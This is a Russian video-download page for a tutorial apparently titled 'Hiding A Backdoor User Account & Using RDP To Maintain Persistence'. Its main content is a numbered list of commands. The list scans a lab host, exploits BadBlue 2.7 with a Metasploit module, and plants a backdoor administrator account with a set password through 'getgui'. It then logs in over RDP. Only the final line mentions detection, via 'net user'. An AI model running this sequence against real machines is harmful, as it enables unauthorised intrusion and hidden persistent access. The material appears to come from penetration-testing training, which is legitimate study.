У нас вы можете посмотреть бесплатно Project 153 - Hiding A Backdoor User Account & Using RDP To Maintain Persistence или скачать в максимальном доступном качестве, видео которое было загружено на ютуб. Для загрузки выберите вариант из формы ниже:
Если кнопки скачивания не
загрузились
НАЖМИТЕ ЗДЕСЬ или обновите страницу
Если возникают проблемы со скачиванием видео, пожалуйста напишите в поддержку по адресу внизу
страницы.
Спасибо за использование сервиса ClipSaver.ru
Commands Used (in the order that they appear in the video): 1. nmap -sS -sV 10.2.18.93 (to see if port 80 is open) - badblue 2.7 service is found 2. service postgresql start && msfconsole 3. workspace -a backdoor 4. setg RHOSTS 10.2.18.93 5. search badblue 6. use exploit/windows/http/badblue_passthru 7. show options 8. exploit 9. getuid 10. sysinfo 11. getprivs 12. run getgui -e -u Daryl -p hacker_123321 13. exit 14. exit -y 15. xfreerdp /u:daryl /p:hacker_123321 /v:10.2.18.93 16. cmd 17. whoami 18. whoami /priv 19. net user (this is the command that another legitimate administrator can use to find the suspicious user account)